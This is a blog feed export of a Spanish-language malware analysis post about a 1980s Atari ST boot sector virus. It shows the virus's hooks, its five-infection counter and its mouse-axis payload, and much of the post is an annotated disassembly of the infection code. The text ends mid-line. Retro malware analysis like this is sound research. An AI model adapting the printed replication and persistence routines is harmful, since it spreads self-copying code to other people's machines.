tag:blogger.com,1999:blog-42204722037304255462024-02-18T18:51:09.687-08:00#Dr. Avalanche LabsAnálisis de Malware que afecta principalmente a la Argentina y Sudamérica.@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.comBlogger111125tag:blogger.com,1999:blog-4220472203730425546.post-70687688354207034892022-01-03T17:53:00.004-08:002022-01-03T17:53:53.963-08:00<p> Hola, me mudé a <a href="https://medium.com/@Dkavalanche">medium</a>.... nos vemos!!!</p><p><br /></p><p>FELIZ 2022!!!</p>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-34594006386073773942021-12-30T19:10:00.011-08:002022-01-02T07:54:23.695-08:00ATARI ST Bootsector Virus<p><br /></p><p><span style="font-family: arial;">Los primeros <a href="https://en.wikipedia.org/wiki/Boot_sector">virus de boot sector</a> aparecieron a mediados y fines de los 80 en lo que por aquel entonces eran las primeras computadoras que podían utilizar un disquete para arrancar el OS, como Atari ST, Commodore Amiga, IBM XT, etc.</span></p><p><span style="font-family: arial;">Recuerdo cuando en mi commodore Amiga apareció el mensaje del payload de infección del SCA Virus. </span></p><p><br /></p><p><span style="font-family: arial;"></span></p><div class="separator" style="clear: both; text-align: center;"><span style="font-family: arial;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzEz0HNJNERbX5TzV-3PHRIC0-danhYUhLLESK0ExHHrICTsWu6RnLvky6Pzuy3XqUE8U5CsUXzaloSxysKZSrHtMg8XSXCtNxkO5Cug-fUCZSnlfAyG1dpKtk-qPD05CLNL1pMjmj2f8/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1080" data-original-width="1920" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzEz0HNJNERbX5TzV-3PHRIC0-danhYUhLLESK0ExHHrICTsWu6RnLvky6Pzuy3XqUE8U5CsUXzaloSxysKZSrHtMg8XSXCtNxkO5Cug-fUCZSnlfAyG1dpKtk-qPD05CLNL1pMjmj2f8/w383-h216/image.png" width="383" /></a></span></div><div class="separator" style="clear: both; text-align: center;"><span style="font-family: arial;"><br /></span></div><div class="separator" style="clear: both; text-align: left;"><span style="font-family: arial;">A partir de allí, empezó mi inquietud sobre estos temas, al principio era tratar de analizarlos dinamicamente y con un editor de discos ver en hexadecimal que mensajes intentaban mostrar. Fue con la llegada de le los BBS en la que pude encontrar mas información, como el código fuente en assembler o los binarios, pero esa ya es otra historia.</span></div><div class="separator" style="clear: both; text-align: center;"><span style="font-family: arial;"><br /></span></div><div class="separator" style="clear: both; text-align: left;"><span style="font-family: arial;">Lo que intentaban estos primeros virus era reproducirse en todos los discos que se inserten en la computadora, tal vez mostrar un mensaje cada tanto, algunos, pero no todos, incorporaban un payload para borrar información en los discos a partir de una determinada fecha u hora, como es caso de <a href="https://en.wikipedia.org/wiki/Michelangelo_(computer_virus)">Michelangelo</a> en PC</span></div><span style="font-family: arial;"><br /><br /></span><p></p><p><span style="font-family: arial;">Hace un tiempo compre una atari st y entre los discos que me pude descargar, encontré uno infectado, por lo que surgió la idea de analizarlo como me hubiese gustado en esa época. </span></p><p><span style="font-family: arial;"> Este analisis está realizado mediante un mix de emulador STEEM y la maquina real.</span></p><p><span style="font-family: arial;"><br /></span></p><p><span style="font-family: arial;">Utilizando el Virus Killer 2000 podemos verificar que el disquete tiene virus y por otro lado podemos hacer un volcado del sector a un archivo, entre otras cosas.</span></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuUDMXXWIwsGGcZSWHliStqOXjMm9dmE01Q94b6sthcrv-ZzLI-8sBHU2I0Xlvy5ZGCxUxl7A2Qt9nyLtHA2AjQnDOnvSt-vM8JJ4ZqCkoYCxwY7Hfm6_v89qNU2RP7xH3JVwbiWQr7wA/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="473" data-original-width="602" height="309" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuUDMXXWIwsGGcZSWHliStqOXjMm9dmE01Q94b6sthcrv-ZzLI-8sBHU2I0Xlvy5ZGCxUxl7A2Qt9nyLtHA2AjQnDOnvSt-vM8JJ4ZqCkoYCxwY7Hfm6_v89qNU2RP7xH3JVwbiWQr7wA/w393-h309/image.png" width="393" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;"><span style="font-family: arial;">Podemos observar con este programa, que variables del sistema se hookea este virus, en este caso se cuelga del RESVECTOR que es el vector de RESET para "sobrevivir" a un reinicio en caliente, también se cuelga del vector Hdv_BPB para monitorizar el estado de la unidad de discos con el fin de activar la rutina de infección.</span></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA_IZlg6aDXr346DYPkZGrja0wuoF6rLBcgdDdzW8vMLFIt_tosF43mUHH0GLTt0oQt9zXA6iQh2C3uhpOLo6w-HRYc-LOTqQImk46-MWjTwZLSCU9Z6dlrL3hKcHnV7tP52e0GTf7Ibo/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="503" data-original-width="714" height="321" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA_IZlg6aDXr346DYPkZGrja0wuoF6rLBcgdDdzW8vMLFIt_tosF43mUHH0GLTt0oQt9zXA6iQh2C3uhpOLo6w-HRYc-LOTqQImk46-MWjTwZLSCU9Z6dlrL3hKcHnV7tP52e0GTf7Ibo/w457-h321/image.png" width="457" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;"><span style="text-align: center;"><span style="font-family: arial;">Aquí</span></span><span style="font-family: arial;"> un sistema limpio.</span></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOCggrM6gfLEP4wJr9N7RRKvejJXYKLCGlgU40Hv2ZHlXsgFsdTNSxB4dfYuJ89VSGL37cFsVW26DldU_kIYuCNJH_MZ52it3FS6b7KjBzss90ZHmX1BA3KqgxPdV_LX2-YQuwv5ck1YQ/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="473" data-original-width="708" height="311" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOCggrM6gfLEP4wJr9N7RRKvejJXYKLCGlgU40Hv2ZHlXsgFsdTNSxB4dfYuJ89VSGL37cFsVW26DldU_kIYuCNJH_MZ52it3FS6b7KjBzss90ZHmX1BA3KqgxPdV_LX2-YQuwv5ck1YQ/w465-h311/image.png" width="465" /></a></div><br /><div style="text-align: left;"><span style="font-family: arial;">Bootsector visto con un editor de discos.</span></div><div style="text-align: left;"><br /></div></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcQKwVT5YFZ-93yoTvd1f5KGVUJ9_ysV5TmEuCSzPh-W6As0RqcHEmjmzOwA9PZSrQjHRsbhUVTrIVTFwnBwA8Hkj62kxHwbqSezzHfL0usl_qAPjxRcRzYoAkYg_2eZxUeGsBHK6S_LQ/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="371" data-original-width="581" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcQKwVT5YFZ-93yoTvd1f5KGVUJ9_ysV5TmEuCSzPh-W6As0RqcHEmjmzOwA9PZSrQjHRsbhUVTrIVTFwnBwA8Hkj62kxHwbqSezzHfL0usl_qAPjxRcRzYoAkYg_2eZxUeGsBHK6S_LQ/w456-h291/image.png" width="456" /></a></div><br /><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: left;"><span style="font-family: arial;">El código ejecutable en el BOOT sector inicia desde 1E</span></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXAfPJjLbQ3Qe5vQik_x9zATZJ5smkwFIl6PnUGMvHtG1thqvtiChfwTEFwX5Ht3XapFZzUERrjXvw1P8_2E4Op6qOyodKS6GK1nZGnCPJsiOAA7zFeuHmskl5NU9ZCF4ZD2yUuRZ-wkI/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="723" data-original-width="782" height="392" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXAfPJjLbQ3Qe5vQik_x9zATZJ5smkwFIl6PnUGMvHtG1thqvtiChfwTEFwX5Ht3XapFZzUERrjXvw1P8_2E4Op6qOyodKS6GK1nZGnCPJsiOAA7zFeuHmskl5NU9ZCF4ZD2yUuRZ-wkI/w424-h392/image.png" width="424" /></a></div><br /><br /></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaC_DCJQRDylZRnKVfdweAt1Di9KYlbQhJ1nXOSBXF5um7XjI1br2iC80yGq5aDUVgEasCmbEMXMjzhXry0I04eYLW8mYsjF0RwcGw18H0x7BEcCqbfEafW5MCAxfprHqhuLnG-uf2wns/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="545" data-original-width="858" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaC_DCJQRDylZRnKVfdweAt1Di9KYlbQhJ1nXOSBXF5um7XjI1br2iC80yGq5aDUVgEasCmbEMXMjzhXry0I04eYLW8mYsjF0RwcGw18H0x7BEcCqbfEafW5MCAxfprHqhuLnG-uf2wns/w482-h306/image.png" width="482" /></a></div><br /><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;"><span style="font-family: arial;">Dumping del bootsector en maquina real utilizando VirusKiller 2000 y </span><span style="text-align: center;"><span style="font-family: arial;">Templemon</span></span><span style="font-family: arial;">.</span></div><br /></div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="328" src="https://www.youtube.com/embed/7QrY6J_bSN0" width="395" youtube-src-id="7QrY6J_bSN0"></iframe></div><div class="separator" style="clear: both; text-align: center;"><span style="font-family: arial;"><br /></span></div><div class="separator" style="clear: both; text-align: left;"><span style="font-family: arial;">Lo mismo se puede hacer con la maquina ya infectada y el programa EasyReader accediendo a la posición de memoria $140.</span></div><div class="separator" style="clear: both; text-align: left;"><span style="font-family: arial;"><br /></span></div><div class="separator" style="clear: both; text-align: left;"><span style="font-family: arial;"><i>Este virus, se instala en la dirección de memoria $0140 y se mantiene residente, intenta infectar el bootsector de cualquier disco insertado en la unidad A utilizando hdv_bpb, y luego de las 5 infecciones seguidas, se activa el payload que consiste en invertir los ejes x/y del mouse.</i></span></div><div class="separator" style="clear: both; text-align: left;"><span style="font-family: arial;"><br /></span></div><div class="separator" style="clear: both; text-align: left;">Analisis del dump del virus. </div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000140 MOVE.L <b>#$000000D6</b>,D3 263C 0000 <b>00D6 </b>Marca de infección del virus.</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000146 LEA $0140,A1 43F8 0140 LEA de memoria RAM $140 en A1 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00014A LEA $000140(PC),A2 45FA FFF4 LEA de memoria RAM donde inicio el boot $000140 en A2; este caso son iguales porque al dumpear la maquina ya estaba infectada.</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00014E MOVE.L (A2),D2 2412 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000150 CMP.L (A1),D2 B491 Verifica marca de infeccion (263C 0000 00D6) </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000152 BEQ $00018E 6700 003A si no esta, continua rutina para instalarse.</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000156 MOVE.L #$31415926,D0 203C 3141 5926 Vector <b>resvalid </b>#$31415926 para saltar a través de resvector / Se realiza una verificación para ver si la memoria se ha dimensionado previamente (inicio en caliente).</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00015C CLR.L D1 4281 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00015E CMP.L $0426,D0 B0B8 0426 Verifica si hubo un warmstart, si no fué un reset salta a 00016A</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000162 BNE $00016A 6600 0006 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000166 MOVE.L $042A,D1 2238 042A Vector <b>resvector </b>$42A - Se carga vector de reset (warmstart) en D1 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00016A LEA $000190(PC),A0 41FA 0024 Se apunta Inicio de rutina de infección, se inicio del disco A: normalmente (NO Warmstart) </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00016E MOVE.L D1,(A0) 2081 Mueve $042A a (A0)</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000170 MOVE.L #$00000194,D2 243C 0000 0194 $00000194 inicio rutina de instalacion del virus </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000176 MOVE.L D2,$042A 21C2 042A Hook del <b>RESVECTOR </b>(Si hay un reinicio del sistema el vector de reinicio ejecuta desde $00000194) </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00017A MOVE.L D0,$0426 21C0 0426 <b>RESVALID </b>-Reset pero cargando rutina de instalación del virus en <b>resvector </b>(persistencia en memoria)</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/-------------COPIA VIRUS A MEMORIA------------------------------------------------------/</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00017E MOVE.W (A2)+,(A1)+ 32DA Copia el virus en memoria desde $xxxxx(PC),A2 a Memoria Address $0140</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000180 DBF D3,$00017E 51CB FFFC Hasta $D2 (211)</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/---------------------------------------------------------------------------------------/</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000184 MOVE.L #$FFFFFFFB,$02EA 21FC FFFF FFFB 02EA </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00018C BSR $0001F2 6164 JMP 0001F2</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00018E RTS 4E75 <span style="white-space: pre;"> </span> Return from suboutine</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/----------------------------------------------------------------------------------------/</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000190 ORI.B #$00,D0 0000 0000 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/RESVECTOR ARRANCA AQUI-RUTINA DE INSTALACION EN MEMORIA-------------------------------------/</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000194 MOVE.L $042E,A1 2278 042E phystop $80000 Este es el final de la memoria física RAM; $ 80000 por una máquina de 512K. </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000198 SUBA.L #$00008000,A1 93FC 0000 8000 <span style="white-space: pre;"> </span> $00008000</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00019E SUBA.L #$00000200,A1 93FC 0000 0200 Reserva 200b para el virus.</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001A4 MOVE.L A1,D1 2209 <span style="white-space: pre;"> </span> </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001A6 MOVE.L #$12123456,(A1)+ 22FC 1212 3456 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001AC MOVE.L D1,(A1)+ 22C1 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001AE LEA $0001F2(PC),A3 47FA 0042 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001B2 LEA $00020E(PC),A4 49FA 005A </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001B6 MOVE.W (A3)+,(A1)+ 32DB </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001B8 CMPA.L A4,A3 B7CC <span style="white-space: pre;"> </span> </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001BA BLT $0001B6 6DFA JUMP if A3 < A3 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001BC LEA $000140(PC),A3 47FA FF82 Carga Inicio del virus. </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001C0 MOVE.L A3,(A1)+ 22CB </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001C2 MOVE.L D1,A3 2641 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001C4 CLR.W D0 4240 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001C6 MOVE.W #$00FE,D2 343C 00FE Contador en $FE</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001CA ADD.W (A3)+,D0 D05B Checksum 255W decremento usando ADD valor queda en D0 -> Source Address(A3)/ Destination D0</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001CC DBF D2,$0001CA 51CA FFFC </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001D0 MOVE.W #$5678,D2 343C 5678 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001D4 SUB.W D0,D2 9440 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001D6 MOVE.W D2,(A3) 3682 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001D8 MOVE.L #$00000000,$0426 21FC 0000 0000 0426 Carga del vector de Reset $0426</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001E0 MOVE.L $000190(PC),A1 227A FFAE <span style="white-space: pre;"> </span> </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001E4 CMPA.L #$00000000,A1 B3FC 0000 0000 <span style="white-space: pre;"> </span> </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001EA BNE $0001F0 6600 0004 <span style="white-space: pre;"> </span> </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001EE JMP (A6) 4ED6 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001F0 JMP (A1) 4ED1 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/-------------------------------------------------------------------------------------------/</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001F2 MOVE.L #$31415926,$0426 21FC 3141 5926 0426 $426 <b>resvalid </b>Si el valor dado se encuentra aquí, se realiza un salto en un reinicio a via reset vector en la dirección $ 42A.</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001FA MOVE.L $0472,D0 2038 0472 <b>Hdv_bpb </b>Determina y devuelve el parameter block, que contiene especificaciones sobre el disquete o disco duro. </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001FE LEA $02E2,A0 41F8 02E2 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000202 MOVE.L D0,(A0) 2080 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000204 LEA $020E,A0 41F8 020E <span style="white-space: pre;"> </span> </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000208 MOVE.L A0,$0472 21C8 0472 <span style="white-space: pre;"> </span> <b>Hdv_bpb </b>hook en $020E </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00020C RTS 4E75 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/-------------------------------------------------------------------------------------------/</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00020E MOVE.W $0004(A7),D0 302F 0004 <--------------Hdv_bpb cada cambio de disco </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000212 CMP.W #$0002,D0 B07C 0002 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000216 BGE $0002E0 6C00 00C8 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/-----------<b>-LEE BOOT SECTOR Funcion Bios FLOPDR </b>-----------------------------------------------/</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00021A MOVEM.L D1-D5/D7-A7,-(A7) 48E7 7DFF </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00021E MOVE.W D0,D7 3E00 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000220 MOVE.L #$00000001,-(A7) 2F3C 0000 0001 Count<span style="white-space: pre;"> </span> 1 - Side 0 - 0001 0000 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000226 MOVE.L #$00010000,-(A7) 2F3C 0001 0000 Track<span style="white-space: pre;"> </span> 0 - Sector 1 - 0000 0001 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00022C MOVE.W D7,-(A7) 3F07 Device<span style="white-space: pre;"> </span> 0 - Disco A </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00022E CLR.L -(A7) 42A7 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000230 LEA $04C6,A5 4BF8 04C6 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000234 MOVE.L (A5),A5 2A55 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000236 MOVE.L A5,A6 2C4D </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000238 MOVE.L A5,-(A7) 2F0D </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00023A MOVE.W #$0008,-(A7) 3F3C 0008 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00023E TRAP #14 4E4E <b> floprd read diskette</b></span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000240 ADDA.L #$00000014,A7 DFFC 0000 0014 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000246 TST.W D0 4A40 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000248 BMI $0002DC 6B00 0092 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00024C MOVE.W #$601C,(A5) 3ABC 601C </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000250 ADDA.L #$0000001E,A5 DBFC 0000 001E </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000256 LEA $000140(PC),A4 49FA FEE8 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00025A LEA $0002F0(PC),A3 47FA 0094 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00025E MOVE.W (A4)+,(A5)+ 3ADC </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000260 CMPA.L A3,A4 B9CB </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000262 BLT $00025E 6DFA </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000264 MOVE.L A6,A5 2A4E </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000266 MOVE.W #$00FE,D1 323C 00FE </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00026A MOVE.W #$1234,D0 303C 1234 Verifica el cheksum del bootsector 1234</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00026E SUB.W (A5)+,D0 905D </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000270 DBF D1,$00026E 51C9 FFFC <span style="white-space: pre;"> </span> |</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000274 MOVE.W D0,(A5) 3A80 <span style="white-space: pre;"> </span></span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/------- INFECTA DISCO Funcion Bios FLOPWR ----------------------------------------------------/</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000276 MOVE.L #$00000001,-(A7) 2F3C 0000 0001 Count<span style="white-space: pre;"> </span> 1 - Side 0 - 0001 0000 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00027C MOVE.L #$00010000,-(A7) 2F3C 0001 0000 Track<span style="white-space: pre;"> </span> 0 - Sector 1 - 0000 0001 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000282 MOVE.W D7,-(A7) 3F07 Device<span style="white-space: pre;"> </span> 0 - Disco A </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000284 CLR.L -(A7) 42A7 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000286 MOVE.L A6,-(A7) 2F0E Buffer</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000288 MOVE.W #$0009,-(A7) 3F3C 0009 Setea parametro para llamar a XBIOS flopwr write diskette sector</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00028C TRAP #14 4E4E Llama al XBIOS </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00028E ADDA.L #$00000014,A7 DFFC 0000 0014 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/------------------------------------------------------------------------------------/</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000294 TST.W D0 4A40 Testea si infecto un nuevo disco</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000296 BMI $0002DC 6B00 0044 Fin de Booteo</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00029A ADDI.L #$00000001,$02EA 06B8 0000 0001 02EA ADD 1 to $02EA (contador de infecciones)</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002A2 CMPI.L #$00000005,$02EA 0CB8 0000 0005 02EA CMP $02EA con 5 (cuando el contador en memoria llega a 5 infecciones se ejecuta el Payload )</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002AA BNE $0002DC 6600 0030 BRANCH sin no alcanzo las 5 infeciones y termina booteo normal</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002AE CLR.L $02EA 42B8 02EA Limpia el contador de infecciones</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/---- PAYLOAD - INTERCAMBIA EJES X/Y DEL MOUSE ------------------------------------------------/</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002B2 MOVE.W #$0022,-(A7) 3F3C 0022 Setea parámetro para llamar <b>kbdvbase </b>del XBIOS</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002B6 TRAP #14 4E4E Llama a la función XBIOS <b>kbdvbase </b>- retorna address vector table en D0 del keyboard (el mismo chip del keyboard maneja joy y mouse)</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002B8 ADDQ.L #2,A7 548F <span style="white-space: pre;"> </span> Arregla pila</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002BA ADD.L #$00000010,D0 D0BC 0000 0010 add $00000010 para obtener la direccion del puntero del mouse que esta en A1E de la tabla</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002C0 EXG D0,A0 C188 <span style="white-space: pre;"> </span> </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/-----INITMOUS XBIOS para inicializar el mouse ------------------------------------------------/</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002C2 MOVE.L (A0),-(A7) 2F10 Mueve dirección a Pila obtenida en <b>kdnvbase</b> carga la pila con valor 